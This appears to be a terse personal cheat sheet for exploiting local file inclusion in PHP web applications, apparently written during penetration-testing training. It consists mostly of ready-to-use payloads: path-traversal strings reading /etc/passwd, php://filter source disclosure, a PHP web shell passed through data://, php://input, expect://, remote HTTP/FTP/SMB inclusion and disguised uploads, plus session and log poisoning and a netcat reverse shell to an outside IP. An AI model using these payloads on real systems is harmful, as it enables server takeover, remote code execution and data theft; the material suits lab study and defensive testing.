LFI
/etc/passwd
../../../etc/passwd
/../../../etc/passwd
....//....//....//etc/passwd
/..//..//..//..//..//..//etc/passwd
..%2F..%2F..%2Fetc%2Fpasswd%0A
./languages/../../../../etc/passwd
/etc/./passwd
/etc/passwd%00
/etc/passwd%00.php
?language=non_existing_directory/../../../etc/passwd/./././.[./ REPEATED ~2048 times]# just use ffuf or gobuster to discover config php
# config is the php file just change it (config.php)
# the webserver always append the php extension
# then just decode the result
ffuf -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-small.txt -u http://94.237.62.149:55270/blog/FUZZ.php
/index.php?language=php://filter/read=convert.base64-encode/resource=config
# Then just decode the base64
echo 'PD9waHAK...SNIP...KICB9Ciov' | base64 -d# see if allow_url_include is on
# that means we can execute some rce
/index.php?language=php://filter/read=convert.base64-encode/resource=../../../../etc/php/7.4/apache2/php.ini
> curl "http://<SERVER_IP>:<PORT>/index.php?language=php://filter/read=convert.base64-encode/resource=../../../../etc/php/7.4/apache2/php.ini" > php-ini.txt
> echo 'BASE64 OF php.ini' | base64 -d | grep allow_url_include
# Then just use the data function (base64&cmd=id)
# first we have to base64 the php cmd command
> echo '<?php system($_GET["cmd"]); ?>' | base64
/index.php?language=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWyJjbWQiXSk7ID8%2BCg%3D%3D&cmd=id
> curl -s 'http://<SERVER_IP>:<PORT>/index.php?language=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWyJjbWQiXSk7ID8%2BCg%3D%3D&cmd=id' | grep uid
# or we could use this way
> curl -s -X POST --data '<?php system($_GET["cmd"]); ?>' "http://<SERVER_IP>:<PORT>/index.php?language=php://input&cmd=id" | grep uid
# or we could use this way
> echo 'BASE64 OF php.ini' | base64 -d | grep expect
> curl -s "http://<SERVER_IP>:<PORT>/index.php?language=expect://id"?language=http://127.0.0.1:80/index.php
# just use python3 server
> echo '<?php system($_GET["cmd"]); ?>' > shell.php
/index.php?language=http://<OUR_IP>:<LISTENING_PORT>/shell.php&cmd=id
# just use python ftp server
> sudo python -m pyftpdlib -p 21
/index.php?language=ftp://<OUR_IP>/shell.php&cmd=id
> curl 'http://<SERVER_IP>:<PORT>/index.php?language=ftp://user:pass@localhost/shell.php&cmd=id'
# just use impacket smbserver
> impacket-smbserver -smb2support share $(pwd)
/index.php?language=\\<OUR_IP>\share\shell.php&cmd=whoami# we can just change the extension of the file before uploading
> echo 'GIF8<?php system($_GET["cmd"]); ?>' > shell.gif
/index.php?language=./profile_images/shell.gif&cmd=id
> echo '<?php system($_GET["cmd"]); ?>' > shell.php && zip shell.jpg shell.php
/index.php?language=zip://./profile_images/shell.jpg%23shell.php&cmd=id<?php
$phar = new Phar('shell.phar');
$phar->startBuffering();
$phar->addFromString('shell.txt', '<?php system($_GET["cmd"]); ?>');
$phar->setStub('<?php __HALT_COMPILER(); ?>');
$phar->stopBuffering();
-------------------------------------------------------------------------------------
> php --define phar.readonly=0 shell.php && mv shell.phar shell.jpg
?language=phar://./profile_images/shell.jpg%2Fshell.txt&cmd=id# PHP session
/index.php?language=/var/lib/php/sessions/sess_nhhv8i0o6ua4g88bkdl9u1fdsd
# Url encoded
/index.php?language=%3C%3Fphp%20system%28%24_GET%5B%22cmd%22%5D%29%3B%3F%3E
<?php system($_GET["cmd"]);?>
# Then just include the session with cmd id
/index.php?language=/var/lib/php/sessions/sess_nhhv8i0o6ua4g88bkdl9u1fdsd&cmd=id
# PS do the steps everytime for every rce commandJust modify the User-Agent to "Apache Log Poisoning"
Then change again the User-Agent to this code
'<?php system($_GET["cmd"]);?>'
Or we could use this curl command
curl -s 'http://<SERVER_IP>:<PORT>/index.php' -A '<?php system($_GET['cmd']); ?>'
For reverse shell from poisoned log
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.9.193.229 4444 >/tmp/f
%72%6d%20%2f%74%6d%70%2f%66%3b%6d%6b%66%69%66%6f%20%2f%74%6d%70%2f%66%3b%63%61%74%20%2f%74%6d%70%2f%66%7c%2f%62%69%6e%2f%73%68%20%2d%69%20%32%3e%26%31%7c%6e%63%20%31%30%2e%39%2e%31%39%33%2e%32%32%39%20%34%34%34%34%20%3e%2f%74%6d%70%2f%66
ffuf -w /opt/useful/SecLists/Discovery/Web-Content/burp-parameter-names.txt:FUZZ -u 'http://<SERVER_IP>:<PORT>/index.php?FUZZ=value' -fs 2287
ffuf -w /opt/useful/SecLists/Fuzzing/LFI/LFI-Jhaddix.txt:FUZZ -u 'http://<SERVER_IP>:<PORT>/index.php?language=FUZZ' -fs 2287
ffuf -w /opt/useful/SecLists/Discovery/Web-Content/default-web-root-directory-linux.txt:FUZZ -u 'http://<SERVER_IP>:<PORT>/index.php?language=../../../../FUZZ/index.php' -fs 2287
ffuf -w ./LFI-WordList-Linux:FUZZ -u 'http://<SERVER_IP>:<PORT>/index.php?language=../../../../FUZZ' -fs 2287Last updated